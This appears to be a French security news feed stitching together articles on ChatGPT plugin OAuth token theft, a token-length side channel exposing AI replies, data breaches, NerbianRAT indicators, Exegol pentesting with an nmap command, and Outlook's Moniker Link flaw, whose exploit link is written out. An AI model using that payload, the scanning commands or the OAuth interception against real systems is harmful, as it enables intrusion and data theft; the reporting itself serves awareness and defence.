L’autre faille concernait des plugins comme Charts by Kesem AI qui ne vérifiaient pas la destination des tokens OAuth. Du coup un hacker pouvait intercepter le lien d’authentification, mettre son propre domaine dedans et envoyer ça à sa proie. Et bam, quand le pigeon cliquait, le token OAuth partait direct dans la poche du méchant qui pouvait ensuite se servir dans le compte lié sur ChatGPT ! Un vol d’identité en 2 clics…
Bon OK, OpenAI et les dévs ont colmaté les brèches rapidos une fois prévenu par les gentils chercheurs en sécu. Mais ça calme… 😰
Salt Labs compte d’ailleurs balancer bientôt d’autres résultats de recherche flippants sur les failles dans les plugins ChatGPT. Sans parler des menaces encore plus perverses comme le vol de prompts, la manipulation des IA ou la création de malwares et de phishing à la chaîne…
Oh la vache les amis, j’ai une nouvelle de dingue à vous raconter ! Vous savez, on kiffe tous nos IA assistants, genre ChatGPT et compagnie. On leur confie nos pensées les plus intimes, nos secrets les mieux gardés. Que ce soit pour des questions de santé, de couple, de taf… On se dit « pas de soucis, c’est crypté, personne ne pourra lire nos conversations privées » (oui, moi je dis « chiffré », mais vous vous dites « crypté »). Eh ben figurez-vous qu’une bande de joyeux lurons (des chercheurs en cybersécu quoi…) a trouvé une faille de ouf qui permet de déchiffrer les réponses des IA avec une précision hallucinante ! 😱
En gros, ils exploitent un truc qui s’appelle un « canal auxiliaire » (ou « side channel » pour les bilingues). C’est présent dans quasiment toutes les IA, sauf Google Gemini apparemment. Grâce à ça et à des modèles de langage spécialement entraînés, un hacker qui espionne le trafic entre vous et l’IA peut deviner le sujet de 55% des réponses interceptées, souvent au mot près. Et dans 29% des cas, c’est même du 100% correct, mot pour mot. Flippant non ?
Concrètement, imaginez que vous discutiez d’un éventuel divorce avec ChatGPT. Vous recevez une réponse du style : « Oui, il y a plusieurs aspects juridiques importants dont les couples devraient être conscients quand ils envisagent un divorce…bla bla bla » Eh ben le hacker pourra intercepter un truc comme : « Oui, il existe plusieurs considérations légales dont une personne devrait avoir connaissance lorsqu’elle envisage un divorce…«
C’est pas exactement pareil mais le sens est là ! Pareil sur d’autres sujets sensibles. Microsoft, OpenAI et les autres se font vraiment avoir sur ce coup-là… 🙈
En fait cette faille elle vient des « tokens » utilisés par les IA pour générer leurs réponses. Pour vous la faire simple, c’est un peu comme des mots codés que seules les IA comprennent. Le souci c’est que les IA vous envoient souvent ces tokens au fur et à mesure qu’elles créent leur réponse, pour que ce soit plus fluide. Sauf que du coup, même si c’est crypté, ça crée un canal auxiliaire qui fuite des infos sur la longueur et la séquence des tokens… C’est ce que les chercheurs appellent la « séquence de longueurs de tokens ». Celle-là, on l’avait pas vu venir ! 😅
Bon vous allez me dire : c’est quoi un canal auxiliaire exactement ?
Alors c’est un moyen détourné d’obtenir des infos secrètes à partir de trucs anodins qui « fuient » du système. Ça peut être la conso électrique, le temps de traitement, le son, la lumière, les ondes… Bref, tout un tas de signaux physiques auxquels on prête pas attention. Sauf qu’en les analysant bien, des hackers malins arrivent à reconstituer des données sensibles, comme vos mots de passe, le contenu de mémoire chiffrée, des clés de chiffrement… C’est ouf ce qu’on peut faire avec ces techniques !
Après attention hein, faut quand même avoir accès au trafic réseau des victimes. Mais ça peut se faire facilement sur un Wi-Fi public, au taf ou n’importe où en fait. Et hop, on peut espionner vos conversations privées avec les IA sans que vous vous doutiez de rien…
Donc voilà, le message que j’ai envie de faire passer avec cet article c’est : Ne faites pas une confiance aveugle au chiffrement de vos conversations avec les IA ! Ça a l’air sûr comme ça, mais y a toujours des ptits malins qui trouvent des failles auxquelles personne n’avait pensé… La preuve avec ce coup de la « séquence de longueurs de tokens » ! Donc faites gaffe à ce que vous confiez aux ChatGPT et autres Claude, on sait jamais qui pourrait mettre son nez dans vos petits secrets… 😉
Allez, je vous laisse méditer là-dessus ! Si vous voulez creuser le sujet, je vous mets le lien vers l’article d’Ars Technica qui détaille bien le truc.
Prenez soin de vous et de vos données surtout ! ✌️ Peace !
France Travail, anciennement Pôle Emploi, a annoncé avoir été piraté dans un communiqué. On peut y lire : La base de données qui aurait été extraite de façon illicite contient les données personnelles d’identification des personnes actuellement inscrites, des personnes précédemment inscrites au cours des 20 dernières années ainsi que des personnes non inscrites sur la liste des demandeurs d'emploi mais ayant un espace candidat sur francetravail.fr. C’est donc potentiellement les données personnelles de 43 millions de personnes qui ont été exfiltrées.
Le communiqué précise : Compte tenu des investigations techniques menées, les données personnelles d’identification exposées sont les suivantes : nom et prénom, date de naissance, numéro de sécurité sociale, identifiant France Travail, adresses mail et postale et numéros de téléphone. Les mots de passe et les coordonnées bancaires ne sont pas concernés par cet acte de cybermalveillance. Il n’existe donc aucun risque sur l’indemnisation.
Le site cybermalveillance.gouv.fr a mis en ligne un formulaire afin que les personnes concernées par cette violation de leurs données personnelles ont la possibilité de déposer plainte si elles le souhaitent, sans avoir à se rendre dans un commissariat ou une gendarmerie. La page de cybermalveillance.gouv.fr indique que l'attaque informatique a eu lieu entre le 6 février et le 5 mars 2024. Soit une plage d'un mois, ce qui semble être un temps fort long.
Vue la situation, la CNIL a publié une page donnant des conseils aux personnes concernées par ce piratage de données, et ajoute : Devant l’ampleur de la violation, la présidente de la CNIL a décidé de mener très rapidement des investigations afin de déterminer notamment si les mesures de sécurité mises en œuvre préalablement à l’incident et en réaction à celui-ci étaient appropriées au regard des obligations du Règlement général sur la protection des données (RGPD).
Oh my god !
Voici une bien mauvaise nouvelle pour les utilisateurs de Linux que nous sommes ! Un malware baptisé NerbianRAT sévit dans la nature depuis au moins 2 ans et il vient juste d’être identifié. Cette saleté est capable de voler vos identifiants en exploitant des failles de sécurité récemment corrigées.
C’est la boîte de sécu Checkpoint Research qui a révélé l’existence de cette variante Linux de NerbianRAT. D’après eux, c’est un groupe de cybercriminels nommé « Magnet Goblin » qui est derrière tout ça. Et leur technique est bien vicieuse : ils exploitent des vulnérabilités à peine patchées (les fameux « 1-day ») en rétro-ingéniérant les mises à jour de sécurité. Comme ça, ils peuvent cibler les machines pas encore à jour. Malin !
En plus de NerbianRAT, Checkpoint a aussi découvert un autre malware appelé MiniNerbian. C’est une version allégée utilisée pour backdoorer les serveurs e-commerce Magento et les transformer en serveurs de commande et contrôle pour le botnet NerbianRAT.
Mais le plus inquiétant c’est que Magnet Goblin est très réactif pour s’accaparer les dernières vulnérabilités 1-day et déployer ses saloperies comme NerbianRAT et MiniNerbian. Ça leur permet d’infecter des machines jusqu’ici épargnés comme les appareils qui se trouvent en périphérie de réseau comme le matériel IoT.
Checkpoint est tombé sur NerbianRAT en analysant les attaques récentes qui exploitent des failles critiques dans Ivanti Secure Connect. Dans le passé, Magnet Goblin a aussi exploité des 1-day dans Magento, Qlink Sense et possiblement Apache ActiveMQ pour propager son malware.
Les chercheurs ont trouvé cette variante Linux de NerbianRAT sur des serveurs compromis contrôlés par Magnet Goblin, avec des URLs du style :
http://94.156.71[.]115/lxrthttp://91.92.240[.]113/aparche2 http://45.9.149[.]215/aparche2C’est pas tout ! Magnet Goblin déploie aussi une version modifiée d’un autre malware voleur d’infos appelé WarpWire. D’après la boîte Mandiant, cette variante engrange des identifiants VPN qu’elle expédie ensuite sur un serveur du domaine miltonhouse[.]nl.
Contrairement à sa version Windows qui est bien obfusquée, NerbianRAT Linux se protège à peine. Son code contient même des infos de debug qui permettent aux chercheurs de voir des trucs comme les noms de fonctions et de variables. Du beau travail…
Alors les amis linuxiens, méfiance ! Même si on se sent à l’abri avec notre machot, faut bien garder à l’esprit qu’aucun OS n’est invulnérable. La sécurité c’est aussi une histoire de comportement. Pensez à mettre régulièrement à jour vos machines, évitez les sites et les programmes louches, et utilisez vos neurones.
Un petit scan antivirus de temps en temps, ça peut pas faire de mal non plus. Et puis au pire, si vous chopez NerbianRAT, dites-vous que vous aurez participé bien malgré vous à une opération de recherche collaborative via VirusTotal 😉
Je vous laisse méditer là-dessus. En attendant portez-vous bien, pensez à éteindre la lumière en partant et que la Force soit avec vous !
— Article en partenariat avec Any.run —
Aujourd’hui, j’aimerais vous parler d’un service qui va modifier totalement la manière dont nous analysons et protégeons nos systèmes contre les menaces informatiques et plus particulièrement contre les attaques de phishing et les malwares qui en découlent.
Il s’agit d’ANY.RUN, un outil basé sur le cloud qui permet d’analyser sans prendre de risque et sans prise de tête, tous types de malwares présents sous Windows ou Linux. Vous l’aurez compris, ce service est d’abord conçu pour aider les chercheurs en sécurité, mais également les équipes SOC (Security Operations Center) et DFIR (Digital forensics and incident response) à examiner en détail les menaces qu’ils détectent, mais également simuler différents scénarios et ainsi obtenir des tonnes d’infos sur le comportement de ces logiciels malveillants.
Pour rappel, un malware est un logiciel malveillant capable de s’infiltrer sur votre ordinateur, et dont le seul but est de vous nuire en vous voulant des données, en vous extorquant de l’argent, en endommageant votre système ou en exploitant votre machine au travers d’un botnet. Sous Windows, ces menaces sont particulièrement virulentes, exploitant la plupart du temps des vulnérabilités du système ou les comportements imprudents des utilisateurs. Mais je ne vous apprends rien en vous disant qu’un simple clic sur un lien dans un email de phishing peut suffire à déployer par exemple un ransomware qui chiffrera alors l’ensemble de vos fichiers et exigera une rançon (en cryptomonnaie ^^) pour les récupérer.
Contrairement à d’autres outils plus basiques comme VirusTotal, ANY.RUN propose un environnement en vase clos où chaque malware peut être exécuté sans risque, comme s’il se déployait sur un véritable système. Cette approche permet aux utilisateurs d’observer en temps réel les actions du malware : De la création de nouveaux processus et l’arrivée de fichiers malveillants jusqu’aux tentatives de connexion à des URL douteuses. Tout ce qui se passe dans le système infecté, y compris les modifications apportées à la base de registre et les communications réseau, est relevé de manière transparente.
Linux étant au cœur des infrastructures informatiques des entreprises et des organisations, il représente également une cible de choix pour les cybercriminels, ce qui se confirme puisque des chercheurs d’IBM ont noté sur 2020, une hausse de 40 % des malwares ciblant spécifiquement Linux. C’est pourquoi ANY.RUN propose en plus de sa sandbox Windows, un environnement basé sur Ubuntu.
Les outils d’audit fournis par ce service permettent également de générer des rapports contenant tout ce qu’il y a à retenir de votre analyse de malware. Je parle bien sûr de vidéos, de captures d’écran, de hash de fichiers, ainsi que toutes les données accumulées durant l’exécution de la tâche.
Comme vous pouvez le voir sur les captures écran, ANY.RUN supporte les dernières versions de tous les navigateurs et systèmes d’exploitation populaires. La plupart des signatures de logiciels malveillants produites par ANY.RUN sont également poussées vers la base ATT&CK de Mitre et sont présentées de manière visuelle et pratique, ce qui permet de former les nouveaux chasseurs de malwares.
Si vous voulez analyser une nouvelle menace potentielle, pas de problème avec ANY.RUN. Il vous suffit d’uploader un fichier ou d’utiliser une URL pour lancer l’analyse dans un environnement Windows de la version de votre choix. Vous pourrez alors ajuster la durée de l’exécution, et simuler des interactions réseaux via un proxy HTTPS ou router le réseau via un VPN/Proxy/Tor. La plateforme propose également plusieurs applications et outils préinstallés pour imiter un environnement utilisateur réel. Les paramètres de confidentialité et de conservation de la tâche sont facilement spécifiables et des fonctionnalités avancées comme l’interactivité automatisée ou l’accès à ChatGPT viendront enrichir encore plus l’analyse.
L’outil affiche le schéma d’attaque du malware dans une structure arborescente interactive, vous permettant de voir en un clin d’œil les principaux processus lancés. Ensuite, toutes les données collectées au travers de cette sandbox peuvent être rejouées autant de fois qu’on le souhaite pour des analyses futures ou tout simplement générer des rapports. Bien sûr, tout est exportable et partageable, ce qui vous permettra de travailler à plusieurs sur une menace.
Dans cet exemple d’un malware en pleine action, celui-ci cherche à s’ancrer dans le système par des modifications du registre Windows, signe d’une tentative de persistance. Il exécute également un fichier batch suspect qui pourrait déployer d’autres composants nuisibles. Il utilise également la commande vssadmin.exe pour effacer les points de restauration du système. C’est une technique typique des ransomwares pour empêcher toute récupération de données après une attaque. Vous voyez, on en apprend beaucoup avec ANY.RUN.
Au-delà des possibilités d’analyse temps réel des malwares, l’intégration poussée de la Threat Intelligence (TI) au sein d’Any Run est également à souligner. Cela se matérialise au travers d’une base de renseignement sur les menaces qui est constamment enrichie par une communauté internationale de chercheurs. Cela permet de collecter et d’analyser les malwares dès qu’ils pointent le bout de leur nez. Les indicateurs de compromission (IOC) sont alors connus, ce qui offre un gros avantage pour la suite. D’ailleurs si vous voulez vous abonner, Any run vous offre gratuitement 50 options TI en passant par ce lien.
On y retrouve dans un flux JSON / STIX ou via le site web, tous les événements liés au malware, les adresses IP, les domaines utilisés, les hash de fichiers…etc. Comme ça, les équipes SOC sont à jour sur les menaces et leurs IOC et peuvent réagir beaucoup plus vite.
Vous l’aurez compris, ANY.RUN permet aux chercheurs en sécurité d’éliminer totalement ce besoin d’avoir une infrastructure d’analyse. C’est un gain de temps et de sécurité assuré ! Et comme c’est un outil professionnel, vous pouvez également l’utiliser en combinaison avec votre SIEM (Security Information and Event Management) / SOAR (Security Orchestration, Automation and Response).
Si l’analyse de malware fait partie de votre travail ou est une passion dévorante, je vous invite donc à essayer ANY.RUN durant les 14 jours d’essai offerts.
Largement de quoi vous faire une idée !
Depuis quelques jours, X (anciennement Twitter) a mis en place une nouvelle fonctionnalité pour tous ses utilisateurs. Vous pouvez désormais passer des appels voix et même vidéos directement sur la plateforme. Malheureusement, cette nouveauté introduit aussi une faille de sécurité qui met en danger vos informations personnelles. Pour vous protéger, rien de mieux qu’un VPN efficace comme NordVPN.
L’article Nouvelle faille de sécurité sur X (ex-Twitter) : sécurisez votre IP avec NordVPN est apparu en premier sur Toms Guide.
Si vous cherchez une application pour gérer tous vos codes de double authentification, je vous propose aujourd’hui qu’on se penche sur le cas de 2FAS.
Il s’agit d’une application disponible en français sous iOS et Android qui est totalement libre et qui supporte les codes TOTP (time-based one-time passwords) et HOTP.
Pour rappel, le 2FA (Two-Factor Authentication) est une méthode d’authentification qui fournit une couche supplémentaire de sécurité pour les comptes en ligne. Ainsi en plus du nom d’utilisateur et du mot de passe, le 2FA utilise un deuxième facteur, qui n’est ni plus ni moins qu’un mot de passe à usage unique (OTP) affiché sur le téléphone de l’utilisateur, pour vérifier l’identité de ce dernier. Cela permet d’empêcher l’accès non autorisé aux comptes, même si le mot de passe est compromis.
Le fonctionnement de 2FAS est assez similaire à celui d’Authy ou de Google Authenticator. Sauf que 2FAS propose de la synchronisation sur votre compte iCloud / Google si vous le désirez et la possibilité d’importer des codes existants depuis d’autres outils comme Aegis, Raivo OTP, Lastpass, Google Authenticator, andOTP ou encore Authenticator Pro. Pour ceux qui sont coincés avec Authy, vu que ça ferme, surveillez le blog dans les jours qui viennent, je vous prépare un tuto pour vous sauver.
Pour sécuriser l’app, vous pouvez lui ajouter un code pin ansi sur le faceID, et cerise sur le gateau, vous avez la possibilité d’installer une extension sur votre navigateur desktop qui ira communiquer directement avec votre smartphone pour saisir à votre place les codes de double authentification via une simple alerte.
Bref, c’est un outil moderne, avec une interface très sympa et en plus c’est libre ! Que demande le peuple ?
Les comptes ChatGPT piratés sont en constante augmentation. Pas moins de 225 000 identifiants OpenAI avec leur mot de passe auraient été mis en vente de janvier à octobre 2023 sur le Dark Web, où les cybercriminels peuvent les acheter sur les places de marché.
L’article ChatGPT : 225 000 comptes piratés sont en vente sur le Dark Web, changez votre mot de passe ! est apparu en premier sur Toms Guide.
Une énorme base de données sur le Dark Web contiendrait plus de 13 millions d'identifiants de comptes français issus de nombreux sites, avec leur mots de passe associés. Il y a de fortes chances que vos données s'y trouvent si vous n'avez pas suivi certaines précautions.
L’article Dark Web : 13 millions d’identifiants français dorment dans une énorme base de données est apparu en premier sur Toms Guide.
Exegol est une planète de l’univers de fiction Star Wars qui abrite le culte de l'éternel Sith. C'est aussi une solution professionnelle complète pour réaliser des tests de pénétration, de l'OSINT et de la recherche de vulnérabilités.
Il existe des distributions comme Kali Linux, malheureusement cette solution n'est pas adaptée au milieu du pentesting professionnel.
Si vous avez besoin d'une artillerie d'outils pour réaliser des tests de cybersécurité offensive, Exegol est une solution complète qui s'installe très facilement sous Linux, Mac OS ou Windows.
La seule difficulté est de connaitre la quantité d'outils disponibles et la multitude d'options possibles pour les lancer. Rien que l'utilisation de Nmap est en soit un vrai casse-tête.
nmap -p- --open -sS --min-rate 5000 -vvv -"IP" -n -Pn -oG allPorts
La réflexion que je me suis posée cette semaine: Est-ce qu'une solution comme Github Copilot CLI pourrait permettre d'améliorer la productivité d'experts en Cybersécurité utilisant Exegol ? Est-ce qu'un CLI à base d'IA génératrice serait en mesure de proposer des commandes shell facilement en fonction de vos besoins ?
Si vous ne connaissez pas Github Copilot CLI, il s'agit d'une solution bêta de shell intelligent propulsé par Github. Cette solution peut simplifier l'usage des lignes de commande sous Linux. Dans cet article, je vais vous partager mon retour d'expérience dans l'utilisation de Github Copilot CLI pour réaliser des pentests et les alternatives possibles.
Exegol est composée de 3 composants :
Exegol fonctionne sous Linux, Mac OS et Windows. Dans mon cas, je l'ai tout simplement installé sous Windows 11 avec Docker Desktop et WSL2.
Exegol fonctionne parfaitement bien avec des plateformes d'apprentissage en cybersécurité comme Hackthebox par exemple, la configuration d'un VPN se fait via l'ajout d'un paramètre "--vpn" lors de l'appel au wrapper Python.
exegol start htb full --vpn "hackthebox.ovpn"
Il est juste important d'être vigilant à l'espace disque consommé par Exegol. L'image docker "full" nécessite pas moins de 50 Go de stockage sur votre disque.
Si vous avez un usage précis d'Exegol, vous pouvez aussi utiliser des images plus petites dédiées à de l'OSINT ou du Pentest pour applications Web.
Exegol est livré dans sa version "full" avec plus de 350 outils dédiés à la cybersécurité. Exegol est très pratique pour gagner du temps, surtout si vous bénéficiez d'un accès Internet assez limité ou d'un accès Internet filtré.
Il est possible d'instancier l'image Docker par environnement client, projet d'analyse ... Cela vous permet ainsi de bien structurer votre espace de travail et d'isoler les outils mis en oeuvre.
Le côté stateless de Docker permet aussi de garantir une meilleure isolation lors des tests réalisés.
La solution Github Copilot CLI est une extension à Github Copilot.
Cette extension permet d'utiliser directement les API d'OpenAI (ChatGPT) pour être plus productif sur l'utilisation d'un terminal.
Github Copilot CLI fonctionne sous la forme d'une commande shell, il vous permet d'expliquer une commande shell ou bien de vous aider à construire une commande très facilement sur la base d'un besoin.
Github Copilot CLI s'installe très facilement au sein de l'image Docker d'Exegol :
type -p curl >/dev/null || (sudo apt update && sudo apt install curl -y)
curl -fsSL https://cli.github.com/packages/githubcli-archive-keyring.gpg | sudo dd of=/usr/share/keyrings/githubcli-archive-keyring.gpg \
&& sudo chmod go+r /usr/share/keyrings/githubcli-archive-keyring.gpg \
&& echo "deb [arch=$(dpkg --print-architecture) signed-by=/usr/share/keyrings/githubcli-archive-keyring.gpg] https://cli.github.com/packages stable main" | sudo tee /etc/apt/sources.list.d/github-cli.list > /dev/null \
&& sudo apt update \
&& sudo apt install gh -y
Authentifiez vous dans l'outil avec votre compte Github et installez l'extension Github Copilot Cli qui permet de transformer la solution Github CLI en solution intelligente.
gh auth login
gh extension install github/gh-copilot
Lancez maintenant la commande suivante :
gh copilot suggest -t shell 'start a python server on port 8000'
Copilot vous proposera la réponse suivante :
Sur des besoins très simples, Github Coppilot CLI peut vous aider à trouver les options et les outils pour répondre à ce que vous souhaitez réaliser.
Il est même en mesure de produire des scripts complets.
Github Copilot CLI est très performant pour répondre à des besoins simples sous Linux, mais malheureusement, il ne saura pas forcément vous aider dans l'utilisation des outils de cybersécurité fournis par Exegol.
Il connait moins de 10% des outils fournis par Exegol et ne semble avoir aucune idée de l'utilisation de Metasploit par exemple.
Il est donc très bon pour un usage générique d'un shell Linux, mais ne sera pas pour le moment d'une grande aide pour un usage autour du pentesting avec les outils de pentesting fournis par la solution Exegol.
La limitation de Gihub Copilot CLI est liée au fait que le LLM utilisé par l'outil n'a pas été entrainé sur les manuels d'utilisation des outils fournis avec Exegol. Le produit étant en phase beta, cette limitation est peut-être temporaire.
Une solution alternative serait de construire soit même une solution à base d'une architecture de type RAG qui permet d'adosser à un LLM une base de connaissance.
Pour cela vous pouvez installer Ollama et un modèle LLM comme Mistral en local sur votre ordinateur.
Ensuite l'outil CLI cmdh vous permet d'interagir directement avec votre LLM en local sans sortir de votre shell.
Enfin, une solution comme LangChain vous permet d'associer une base de connaissance un LLM grâce à l'utilisation d'embeddings.
En cherchant sur le Web, je suis tombé sur le CLI LLM python de datasette.io qui permet de construire une solution de type RAG très rapidement via un répository de fichiers au format Markdown.
Il en existe probablement d'autres solutions sur le Web, mais je n'ai pas trouvé aujourd'hui d'assistant CLI à base de LLM et de RAG capable d'indexer facilement des documents pour générer des shell prêt à l'utilisation.
C'est peut-être l'occasion de créer un nouveau projet qui s'inspirerait de Github Copilot CLI et d'OpenInterpreter, qui permettrait de simplifier des processus de pentesting ? Quel pourrait être son nom ? Sith
$sith "scan the IP 192.68.1.1 with all ports from 1 to 1000"
$sith "find a sqli on the following url : http://www.geeek.org/?q=param"
Suite la lecture de cet article vous avez des questions ? N'hésitez pas à continuer la discussion sur le serveur Discord Geeek.org.
Alors que des milliers de comptes allocataires ont été compromis, la CAF prend des mesures drastiques. Les utilisateurs doivent ainsi changer leur mot de passe avant le 8 mars, date à partir de laquelle la modification leur sera imposée.
L’article CAF : pourquoi vous devez absolument changer de mot de passe d’ici le 8 mars est apparu en premier sur Toms Guide.
Alors que l’Anssi publie aujourd’hui son Panorama de la menace, notant une augmentation de 30% des cyberattaques visant à dérober les données des Français, l’enquête annuelle de Proofpoint, State of the Phish 2024 présente des conclusions édifiantes quant aux risques pris par les Français eux-mêmes.
Cette dixième édition du rapport annuel State of the Phish de Proofpoint révèle que plus des trois quarts (75 %) des salariés français mettent sciemment leur organisation en danger, entraînant une multiplication des risques d’infections par rançongiciel ou logiciels malveillants, un accroissement des cas de violation de données, et des pertes financières plus grandes.
Et si en France les cas de campagnes d’hameçonnage réussies ont légèrement diminué (66 % des organisations interrogées ont subi au moins une attaque réussie en 2023 contre 86 % l’année précédente), la France se démarque par l’augmentation substantielle des sanctions financières notamment imposées par les législateurs (+320 % contre 144 % en moyenne dans le monde) et par les atteintes à la réputation de l’entreprise (+166 % en France contre une augmentation moyenne de 50 % dans le reste du monde).
Le rapport 2024 souligne aussi que les comportements à risque ne sont pas nécessairement dus à un manque de connaissances en matière de cybersécurité, mais à l’écart qui existe entre les limites des technologies de sécurité individuelle et la formation des utilisateurs. Si les professionnels de la sécurité estiment que la plupart de leurs collaborateurs comprennent la responsabilité qu’ils ont dans la protection de leur organisation, il semble que la sensibilisation à la sécurité ne soit pas suffisante pour prévenir complètement ces comportements dangereux.
« Les cybercriminels savent qu’un individu peut être facilement trompé, que ce soit par négligence, à travers la compromission d’identité ou, dans certains cas, par appât du gain », a déclaré Ryan Kalember, directeur de la stratégie chez Proofpoint. « Les utilisateurs jouent un rôle central dans la posture de sécurité de l’organisation, 74 % des violations étant encore centrées sur l’humain. Bien qu’il soit important de renforcer la culture de sécurité de l’entreprise, la formation à elle seule n’est pas une solution miracle. Il y a une différence notoire entre la parole et l’action : le défi n’est plus seulement la sensibilisation, mais aussi le changement de comportement. »
Le rapport State of the Phish de cette année apporte un aperçu détaillé du paysage actuel de la menace cyber, dans lesquelles l’IA générative, les QR codes et l’authentification multifactorielle (MFA) sont utilisés de manière abusive par des acteurs malveillants, comme en témoignent les données de télémétrie internes. En effet, Proofpoint a analysé plus de 2,8 milliards de courriers électroniques dans 230 000 organisations à travers le monde, ainsi que les résultats de 183 millions de simulations d’attaques par hameçonnage au cours des douze derniers mois.
Les principales conclusions du rapport State of the Phish 2024 pour la France sont les suivantes :
Les collaborateurs n’exposent pas leur entreprise aux cyberattaques par manque de sensibilisation : 79 % des sondés français ont admis avoir pris des mesures risquées, telles que la réutilisation ou le partage d’un mot de passe, le fait de cliquer sur des liens provenant d’expéditeurs inconnus, ou en communiquant leurs informations d’identification à une source non fiable. Parmi eux, 95 % l’ont fait en connaissance des risques inhérents à la sécurité, ce qui signifie que 75 % des salariés français interrogés ont volontairement porté atteinte à la sécurité de leur entreprise. Les objectifs derrière les actions risquées sont variés, la plupart des sondés citant la commodité (43 %), le désir de gagner du temps (36 %) et le sentiment d’urgence (29 %) comme principales motivations.
Un écart entre les équipes informatiques et le reste de l’organisation empêche un réel changement de comportement : alors que 79 % des professionnels français de la sécurité interrogés déclarent que la plupart de leurs collaborateurs comprennent la responsabilité qu’ils portent quant à la sécurité de l’entreprise, 64 % des employés interrogés n’en sont pas sûrs ou affirment qu’ils ne sont pas du tout responsables. Et même si la quasi-totalité des employés qui ont pris des mesures risquées connaissait les risques (95 %) — ce qui indique clairement que la formation en matière de sécurité contribue à sensibiliser les employés — il existe de nettes disparités entre la vision des professionnels de la sécurité et celle des autres collaborateurs, pour créer un véritable changement de comportement à l’échelle de l’entreprise. En France, les professionnels de la sécurité estiment que plus de formation (76 %) et des contrôles plus stricts (80 %) sont la solution, mais presque tous les employés interrogés (94 %) ont déclaré qu’ils donneraient la priorité à la sécurité si les contrôles étaient simplifiés et plus conviviaux.
La MFA continue de donner un faux sentiment de sécurité : plus d’un million d’attaques sont lancées chaque mois à l’aide d’EvilProxy, un système de contournement de la MFA. Pourtant, il est inquiétant de constater que 91 % des professionnels français de la sécurité pensent encore que la MFA offre une protection complète contre la prise de contrôle d’un compte.
L’IA booste les attaques par compromission d’identité (BEC) : en France, 62 % des organisations interrogées ont été la cible d’attaques BEC (Business Email Compromise) en 2023, un chiffre en baisse par rapport à l’année précédente où le pourcentage était de 80 %. Dans l’ensemble, il y a eu moins de signalements de tentatives de fraude par courriel au niveau mondial, mais certains pays ont connu une augmentation du volume d’attaques, comme le Japon (+35 %), la Corée du Sud (+31 %) et les Émirats Arabes Unis (+29 %). Ces pays ont peut-être été moins touchés par les attaques BEC dans le passé en raison de barrières culturelles ou linguistiques, mais l’utilisation de l’IA générative permet aux attaquants de créer des courriels plus convaincants et personnalisés dans plusieurs langues. En moyenne, Proofpoint détecte 66 millions d’attaques BEC ciblées chaque mois.
La cyber extorsion reste une forme d’attaque lucrative et le paiement de rançon ne garantit pas la récupération complète des données : 70 % des organisations françaises interrogées ont été infectées par un rançongiciel au cours de l’année écoulée (soit une augmentation de 6 points de pourcentage d’une année sur l’autre) ; de manière alarmante, 63 % des professionnels français de l’informatique ont déclaré que leur organisation avait été infectée par plusieurs rançongiciels distincts. Parmi les organisations touchées en France, 30 % ont accepté de payer les attaquants (contre 54 % en moyenne dans le monde), et seuls 47 % ont retrouvé l’accès complet à leurs données après un seul paiement (contre 63 % il y a un an).
Les attaques par téléphone (TOAD) continuent de proliférer : bien qu’apparaissant initialement comme un message innocent, ne contenant rien de plus qu’un numéro de téléphone et quelques informations erronées, la chaîne d’attaque est activée lorsqu’un collaborateur peu méfiant appelle un centre d’appel frauduleux, fournissant ses informations d’identification ou accordant un accès à distance à des acteurs malveillants. Proofpoint détecte en moyenne 10 millions d’attaques TOAD par mois, avec un pic récent en août 2023, avec 13 millions d’incidents.
Malgré l’importance et la sophistication croissante des menaces telles que les rançongiciels, les TOAD et les contournements de MFA, de nombreuses organisations ne sont pas suffisamment préparées ou formées pour y faire face. Seuls 16 % des organisations françaises interrogées forment leurs utilisateurs à la reconnaissance et à la prévention des attaques TOAD, et seulement 25 % à la sécurité de l’IA générative.
Pour télécharger le rapport State of the Phish 2024 : proofpoint.com/us/resources/threat-reports/state-of-phish.
Une faille critique a été découverte dans le logiciel de mesagerie Microsoft Outlook par Haifei Li, chercheur en sécutité de la société Check Point. Cette vulnérabilité est estampillée CVE-2024-21413. Cette vulnérabilité est critique car son exploit permet l'exécution de code arbitaire à distance sans d'autre action de l'utilisateur que cliquer sur un lien malicieux présent dans un mail contenant l'attaque.
Microsoft a publié un correctif qui fait partie du Tuesday Patch de février. Celui-ci doit être appliqué d'urgence sur les machines qui sont configurées pour ne pas appliquer les mises à jour automatiquement. Les systèmes affectés sont :
Cette faille est baptisée Moniker Link. Pour l'exploiter il suffit d'incorporer un simple lien malicieux dans un mail. Le lien peut ressembler à ça :
<a href="file:///\\10.10.111.111\test\test.rtf!something">CLICK ME</a>
C'est la presence du point d'exclamation (!) devant la chaîne aléatoire 'something' qui déclenche l'exploit de la vulnérabilité. Un tel lien contourne la protection interne d'Outlook contre le téléchargement de ressources distantes. Un clic sur un tel lien va télécharger et ouvrir le fichier sans qu'Outlook émette le moindre avertissement. Si le fichier téléchargé est par exemple un fichier Office qui contient du code malicieux, celui-ci sera exécuté.
Cette faille est entièrement expliquée techniquement dans un très intéressant billet de Haifei Li sur le blog de Check Point.
A tous les fondus d’analyse de code, aujourd’hui, j’aimerais vous présenter De4Py, un déobfuscateur Python avancé qui s’est donné pour mission de révolutionner le domaine pour les analystes de malwares et les experts en reverse engineering.
Développé par le duo Fadi002 et AdvDebug, cet outil se distingue non seulement par son interface conviviale, mais aussi par un ensemble de fonctionnalités avancées conçues pour, entre autres, déchiffrer les fichiers Python.
Ce toolkit prend en charge toute une gamme d’obfuscateurs populaires, incluant Jawbreaker, BlankOBF, PlusOBF, Wodx, Hyperion et l’obfuscateur de pyobfuscate.com. Cette polyvalence vous assure de pouvoir décoder un large éventail de fichiers obfusqués avec une grande facilité.
L’une des fonctionnalités phares de l’outil est sa capacité d’exécution de code. Cela permet aux utilisateurs d’exécuter du code Python au sein de l’outil. Par exemple, ils expliquent sur le Github, que grâce à ça, si un programme demande une licence pour fonctionner dans son intégralité, De4py permet d’accéder directement aux fonctionnalités principales de l’outil, et par conséquent de contourner les restrictions liées à la licence.
La fonction de Dump de chaînes de caractères est un autre atout crucial. Elle facilite l’extraction de textes du processus Python et les sauvegarde dans un fichier, rendant plus aisée l’extraction de données de la mémoire, y compris des informations sensibles comme les webhooks. Il est capable également d’identifier les chaines de caractères « interessantes » comme les IP, les sites web et les mots-clés liés à des informations sensibles.
